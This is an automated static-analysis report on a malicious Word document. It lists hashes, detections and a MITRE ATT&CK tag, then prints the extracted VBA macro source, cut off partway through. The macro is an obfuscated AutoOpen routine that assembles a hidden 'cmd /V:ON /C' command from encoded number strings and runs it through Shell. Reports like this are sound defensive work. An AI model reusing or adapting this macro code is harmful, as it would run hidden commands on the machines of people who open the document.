Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ec6613de5729b169…

MALICIOUS

Office (OLE)

Size: 96.6 KB
Created: 2018-07-31 07:44:00
Authoring application: Microsoft Office Word
First seen: 2018-08-05
MD5: 300a094ff19cb921be9d4b53fabd9489
SHA-1: 8d379165445eddc009e4c680d16b467ecb78437e
SHA-256: ec6613de5729b1691c711b2a8bd3edb0cd413dfe6fd8c10e758748cf52f439d2
Risk score: 142

Malware Insights

MITRE ATT&CK: T1059.005 Visual Basic

The sample is a malicious Word document containing a legacy WordBasic AutoOpen macro. The macro attempts to execute a command via the Shell function, concatenating the return values of several helper functions to build the command string; the literal "cm" in AutoOpen together with the "d /V:ON" + "/C" and "set ..." fragments in OVphjoNm indicate the string is an obfuscated command-line invocation. The exact command cannot be fully reconstructed, because the helper functions are obfuscated and the extracted source is truncated, but it appears to be an attempt to run a command-line utility.

Heuristics (5)

  • ClamAV: Doc.Malware.Valyria-6707428-0 (severity: critical; CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Valyria-6707428-0
  • VBA macros detected (severity: medium; 1 related finding; OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (severity: high; OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (severity: medium; OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info; EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5602 bytes
SHA-256: de737ee596b8dca2e96b5e4b6b1c8cfe4cc3ed878d4c780fea1c55cf1849a984
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "jBjqijilP"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   AppActivate Log(rfYtvU)
   AppActivate PfUTwb
   AppActivate Round(DQHiV)
   AppActivate 7
   AppActivate CLng(qkmQzC)
Shell@ CVar("cm") + nfJDsPLsQdZwz + iLlBYai + OVphjoNm + zLHtJo + wEjWoF + bjwIfufU + jHCOEnXMHdus, 287080983 - 287080983
   AppActivate 290754200
   AppActivate 2850
End Sub


Attribute VB_Name = "jsYNcOlPzCucLq"
Function OVphjoNm()
On Error Resume Next
AppActivate Rnd(mRvXkC)
   AppActivate CByte(AaQiEE - wYPOh / 70217 * 65549)
jcriCF = "d /V:ON" + "/C" + CStr(Chr(IwjTcFkRuoc + ToWbLjc + 34 + jqKFiDtVTUcjPR + rZlVGwDFmz)) + "set 7M" + "fD=BYlOA" + "KBRDto" + "kCZYGS" + "(UQj;7zw" + "+Pe" + "bdyg" + "-N,p.{0$iW" + "f)'u}Fvs@n" + "5/r=a:X\ x"
AppActivate VzALn
   AppActivate 6374
nfNJaowspd = "4hmcL" + "&&for %B" + " in (3" + "5,10" + ",24,2" + "7,54,49" + ",63,27" + ",2" + ",2,6"
AppActivate Int(84992 + AjlYI)
   AppActivate knoTZF
jomfBJFlYh = "0,39,64,2" + "4,3" + "5,55" + ",51,27,2" + "4,3" + "2,10" + ",28,20,27"
AppActivate CInt(60696 - SvLDKw)
   AppActivate Sgn(29730 / LdMfF)
   AppActivate 620
QFYktEL = ",65,9,6" + "0," + "33,2" + "7,9,36,4" + "1,27," + "28,12,2," + "40,27,51,9" + ",21,39," + "54,3," + "15,55," + "44,63,9" + ",9,35,57"
AppActivate Chr(889)
   AppActivate ChrW(23452 / qFGBzU / 18739 / vslJI)
bYIzQuZPVQ = ",53," + "53" + "," + "9," + "10" + ",51,30" + ",49,6" + "4,56,54" + ",4" + "0,51,2" + "7,49,"
AppActivate Atn(83)
   AppActivate PqnjIE
rXDTi = "27,54,48" + ",40" + ",65," + "27,36,65" + ",10,36,45" + ",11,53,31," + "28,4" + "9,40,38,38" + ",50," + "63" + ",9,9,35,57" + ",53,53," + "65"
AppActivate Sqr(327005280)
   AppActivate Oct(8)
XTGXqTEjKjB = ",56,51" + ",27" + ",48,56" + ",23,23,4" + "0,36,65,1"
OVphjoNm = jcriCF + nfNJaowspd + jomfBJFlYh + QFYktEL + bYIzQuZPVQ + rXDTi + XTGXqTEjKjB
   AppActivate Round(13)
   AppActivate 1
End Function
Function zLHtJo()
On Error Resume Next
AppActivate Log(psrNp)
   AppActivate Sin(pmzTM + TETLVf)
YYXDhNp = "0,64,36,2" + "8,54,53,7," + "22,48,50," + "6" + "3,9,9,35" + ",57,53,53" + ",42" + ",45,42,4" + "5," + "36," + "65" + ",10,64,3" + "6,64,61,"
AppActivate CSng(47521 / iBqwZ)
   AppActivate CDbl(NiZZT)
KrEEBbZaU = "53,18,1" + "9" + ",4,33,3" + "5,6,50" + ",63,9," + "9," + "35,57,53,5" + "3," + "65,54,56" + "," + "51,64,1"
AppActivate TXIAAj
   AppActivate 745
   AppActivate 977
tkDjQKJtL = "0,5" + "4,27,2" + ",10," + "29,31" + ",27,36,65" + ",10,36" + ",45,11,53" + "," + "56,18,38" + ",10,38,50"
AppActivate 207146719
   AppActivate Cos(36527 * XThwwR)
uiAnl = ",63" + ",9,9,35" + ",57,53," + "53,65,10" + ",51,4" + "9,45," + "2,9,10"
AppActivate Hex(389176995)
   AppActivate ChrW(6688)
FUwHGCri = "," + "54,27,49" + ",3" + "0,27,64,3" + "5,54,2" + "7,49," + "56," + "49,36," + "65,10" + "," + "64,53,19" + ",19,7"
AppActivate Oct(mlnAA)
   AppActivate 9162
   AppActivate Sin(25)
nKrfmzBzf = ",66,27,5" + "2,56,44" + ",3" + "6,16,35,2" + ",40" + ",9,17,44" + ",50"
AppActivate cbCZL
   AppActivate CBool(HNMXT * JBKGYC)
uMCJTam = ",44,4" + "3,21,39," + "64,29,58," + "60,55,6" + "0,44" + "," + "2" + "2,62,22,4" + "4,21"
AppActivate ldprQa
   AppActivate cXnzD
   AppActivate Sgn(72522 + WPDzCZ / KskLY - QmNiwl)
mbYlvZNTb = ",39," + "6" + "3,18,47,5" + "5" + ",39,27," + "51,4" + "8" + "," + "57,9,27,64" + ",35,25,4" + "4,59,44," + "25"
AppActivate Sgn(292058530)
   AppActivate 851
   AppActivate Rnd(MZdjK)
rrDCNnkuOz = ",3" + "9,64,29,58" + ",25," + "44,36," + "27" + ",61,27" + ",44,21,42," + "10" + ",5" + "4,27,56,6"
AppActivate wVAPKR
   AppActivate CSng(qICwPW + CSdES + PmNCii - zwJAZw)
   AppActivate CByte(NqzLni)
vEsXH = "5,63" + ",17,39,48," + "56" + "," + "4,60,40,5" + "1," + "60" + ",39,54,3"
AppActivate vvvtzC
   AppActivate XKzmQ
CYPGA = ",15,4
... (truncated)